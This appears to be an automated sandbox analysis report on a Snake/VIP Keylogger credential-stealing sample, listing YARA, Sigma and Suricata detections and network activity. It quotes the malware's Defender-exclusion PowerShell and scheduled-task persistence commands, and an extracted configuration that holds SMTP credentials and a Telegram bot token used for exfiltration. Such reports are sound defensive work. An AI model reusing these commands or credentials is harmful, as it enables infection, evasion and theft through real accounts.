10.2.FT876567090.exe.2f20f20.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x352af:$a1: get_encryptedPassword 0x35283:$a2: get_encryptedUsername 0x35347:$a3: get_timePasswordChanged 0x3525f:$a4: get_passwordField 0x352c5:$a5: set_encryptedPassword 0x35092:$a7: get_logins 0x30956:$a10: KeyLoggerEventArgs 0x30925:$a11: KeyLoggerEventArgsEventHandler 0x35166:$a13: _encryptedPassword
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.FT876567090.exe.2f20f20.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e724:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e981:$a4: \Orbitum\User Data\Default\Login Data 0x3f360:$a5: \Kometa\User Data\Default\Login Data
10.2.FT876567090.exe.2f20f20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e88:$s1: UnHook 0x32e24:$s2: SetHook 0x32e5d:$s3: CallNextHook 0x32dec:$s4: _hook
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.5560000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x352af:$a1: get_encryptedPassword 0x35283:$a2: get_encryptedUsername 0x35347:$a3: get_timePasswordChanged 0x3525f:$a4: get_passwordField 0x352c5:$a5: set_encryptedPassword 0x35092:$a7: get_logins 0x30956:$a10: KeyLoggerEventArgs 0x30925:$a11: KeyLoggerEventArgsEventHandler 0x35166:$a13: _encryptedPassword
10.2.FT876567090.exe.2f20000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.FT876567090.exe.2f20000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.FT876567090.exe.2f20000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.FT876567090.exe.2f20000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x352af:$a1: get_encryptedPassword 0x35283:$a2: get_encryptedUsername 0x35347:$a3: get_timePasswordChanged 0x3525f:$a4: get_passwordField 0x352c5:$a5: set_encryptedPassword 0x35092:$a7: get_logins 0x30956:$a10: KeyLoggerEventArgs 0x30925:$a11: KeyLoggerEventArgsEventHandler 0x35166:$a13: _encryptedPassword
15.2.EYDNKhhJr.exe.2fa0c86.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.EYDNKhhJr.exe.2fa0c86.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.EYDNKhhJr.exe.2fa0c86.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.FT876567090.exe.2f20f20.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x336af:$a1: get_encryptedPassword 0x33683:$a2: get_encryptedUsername 0x33747:$a3: get_timePasswordChanged 0x3365f:$a4: get_passwordField 0x336c5:$a5: set_encryptedPassword 0x33492:$a7: get_logins 0x2ed56:$a10: KeyLoggerEventArgs 0x2ed25:$a11: KeyLoggerEventArgsEventHandler 0x33566:$a13: _encryptedPassword
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x361cf:$a1: get_encryptedPassword 0x361a3:$a2: get_encryptedUsername 0x36267:$a3: get_timePasswordChanged 0x3617f:$a4: get_passwordField 0x361e5:$a5: set_encryptedPassword 0x35fb2:$a7: get_logins 0x31876:$a10: KeyLoggerEventArgs 0x31845:$a11: KeyLoggerEventArgsEventHandler 0x36086:$a13: _encryptedPassword
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e724:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e981:$a4: \Orbitum\User Data\Default\Login Data 0x3f360:$a5: \Kometa\User Data\Default\Login Data
10.2.FT876567090.exe.2f20000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x361cf:$a1: get_encryptedPassword 0x361a3:$a2: get_encryptedUsername 0x36267:$a3: get_timePasswordChanged 0x3617f:$a4: get_passwordField 0x361e5:$a5: set_encryptedPassword 0x35fb2:$a7: get_logins 0x31876:$a10: KeyLoggerEventArgs 0x31845:$a11: KeyLoggerEventArgsEventHandler 0x36086:$a13: _encryptedPassword
10.2.FT876567090.exe.5560000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e724:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e981:$a4: \Orbitum\User Data\Default\Login Data 0x3f360:$a5: \Kometa\User Data\Default\Login Data
15.2.EYDNKhhJr.exe.2fa0c86.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x336af:$a1: get_encryptedPassword 0x33683:$a2: get_encryptedUsername 0x33747:$a3: get_timePasswordChanged 0x3365f:$a4: get_passwordField 0x336c5:$a5: set_encryptedPassword 0x33492:$a7: get_logins 0x2ed56:$a10: KeyLoggerEventArgs 0x2ed25:$a11: KeyLoggerEventArgsEventHandler 0x33566:$a13: _encryptedPassword
10.2.FT876567090.exe.2f20f20.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d481:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cb24:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cd81:$a4: \Orbitum\User Data\Default\Login Data 0x3d760:$a5: \Kometa\User Data\Default\Login Data
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ffa1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f644:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f8a1:$a4: \Orbitum\User Data\Default\Login Data 0x40280:$a5: \Kometa\User Data\Default\Login Data
15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e88:$s1: UnHook 0x32e24:$s2: SetHook 0x32e5d:$s3: CallNextHook 0x32dec:$s4: _hook
15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33da8:$s1: UnHook 0x33d44:$s2: SetHook 0x33d7d:$s3: CallNextHook 0x33d0c:$s4: _hook
10.2.FT876567090.exe.2f20000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ffa1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f644:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f8a1:$a4: \Orbitum\User Data\Default\Login Data 0x40280:$a5: \Kometa\User Data\Default\Login Data
10.2.FT876567090.exe.5560000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e88:$s1: UnHook 0x32e24:$s2: SetHook 0x32e5d:$s3: CallNextHook 0x32dec:$s4: _hook
10.2.FT876567090.exe.2f20000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33da8:$s1: UnHook 0x33d44:$s2: SetHook 0x33d7d:$s3: CallNextHook 0x33d0c:$s4: _hook
15.2.EYDNKhhJr.exe.2fa0c86.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d481:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cb24:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cd81:$a4: \Orbitum\User Data\Default\Login Data 0x3d760:$a5: \Kometa\User Data\Default\Login Data
10.2.FT876567090.exe.2f20f20.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31288:$s1: UnHook 0x31224:$s2: SetHook 0x3125d:$s3: CallNextHook 0x311ec:$s4: _hook
15.2.EYDNKhhJr.exe.2fa0c86.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31288:$s1: UnHook 0x31224:$s2: SetHook 0x3125d:$s3: CallNextHook 0x311ec:$s4: _hook
0.2.FT876567090.exe.4423768.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x10b0f0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0xee0c0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0xee740:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x121160:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x10cdca:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x10ca10:$s5: delete[] 0x10bec8:$s6: constructor or from DllMain.
Click to see the 68 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FT876567090.exe", ParentImage: C:\Users\user\Desktop\FT876567090.exe, ParentProcessId: 7408, ParentProcessName: FT876567090.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe", ProcessId: 7716, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe, ParentImage: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe, ParentProcessId: 4176, ParentProcessName: EYDNKhhJr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp", ProcessId: 7304, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 118.69.190.131, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\FT876567090.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49847

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FT876567090.exe", ParentImage: C:\Users\user\Desktop\FT876567090.exe, ParentProcessId: 7408, ParentProcessName: FT876567090.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp", ProcessId: 7872, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FT876567090.exe", ParentImage: C:\Users\user\Desktop\FT876567090.exe, ParentProcessId: 7408, ParentProcessName: FT876567090.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe", ProcessId: 7716, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FT876567090.exe", ParentImage: C:\Users\user\Desktop\FT876567090.exe, ParentProcessId: 7408, ParentProcessName: FT876567090.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp", ProcessId: 7872, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T14:23:13.888029+0100	2803305	3	Unknown Traffic	192.168.2.6	49733	104.21.67.152	443	TCP
2024-12-16T14:23:16.983370+0100	2803305	3	Unknown Traffic	192.168.2.6	49749	104.21.67.152	443	TCP
2024-12-16T14:23:22.903563+0100	2803305	3	Unknown Traffic	192.168.2.6	49769	104.21.67.152	443	TCP
2024-12-16T14:23:32.172539+0100	2803305	3	Unknown Traffic	192.168.2.6	49805	104.21.67.152	443	TCP
2024-12-16T14:23:38.236425+0100	2803305	3	Unknown Traffic	192.168.2.6	49826	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T14:23:10.119780+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49720	158.101.44.242	80	TCP
2024-12-16T14:23:12.307348+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49720	158.101.44.242	80	TCP
2024-12-16T14:23:13.225114+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49731	158.101.44.242	80	TCP
2024-12-16T14:23:15.260415+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49742	158.101.44.242	80	TCP
2024-12-16T14:23:15.338570+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49731	158.101.44.242	80	TCP
2024-12-16T14:23:18.321124+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49756	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FT876567090.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Avira: detection malicious, Label: HEUR/AGEN.1305388

Found malware configuration

Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat_id": "6443825857", "Version": "4.4"}
Source: 10.2.FT876567090.exe.2f20000.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
Source: EYDNKhhJr.exe.3704.15.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: FT876567090.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FT876567090.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: FT876567090.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49730 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49741 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49829 version: TLS 1.2

Source: FT876567090.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: _.pdb source: FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 070D76F9h	0_2_070D7A10
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B02834h	10_2_05B02580
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0D82Ch	10_2_05B0D580
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B03206h	10_2_05B02DE8
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0DC84h	10_2_05B0D9D8
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B03206h	10_2_05B02DDA
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B03206h	10_2_05B03134
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0D3D4h	10_2_05B0D128
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0CF7Ch	10_2_05B0CCD0
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_05B00040
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0FAECh	10_2_05B0F840
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0F23Ch	10_2_05B0EF90
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0F694h	10_2_05B0F3E8
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B00D10h	10_2_05B00B30
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0169Ah	10_2_05B00B30
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0EDE4h	10_2_05B0EB38
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0E534h	10_2_05B0E288
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0E98Ch	10_2_05B0E6E0
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 4x nop then jmp 05B0E0DCh	10_2_05B0DE30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F63206h	15_2_05F62DE8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F63206h	15_2_05F62DDB
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6DC84h	15_2_05F6D9D8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F62834h	15_2_05F62580
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6D82Ch	15_2_05F6D580
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F63206h	15_2_05F63134
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6D3D4h	15_2_05F6D128
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6CF7Ch	15_2_05F6CCD0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05F60856
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05F60040
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6FAECh	15_2_05F6F840
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6F694h	15_2_05F6F3E8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6F23Ch	15_2_05F6EF90
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F60D10h	15_2_05F60B30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6169Ah	15_2_05F60B30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6EDE4h	15_2_05F6EB38
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6E98Ch	15_2_05F6E6E0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6E534h	15_2_05F6E288
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05F60676
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 4x nop then jmp 05F6E0DCh	15_2_05F6DE30

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.6:49847 -> 118.69.190.131:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
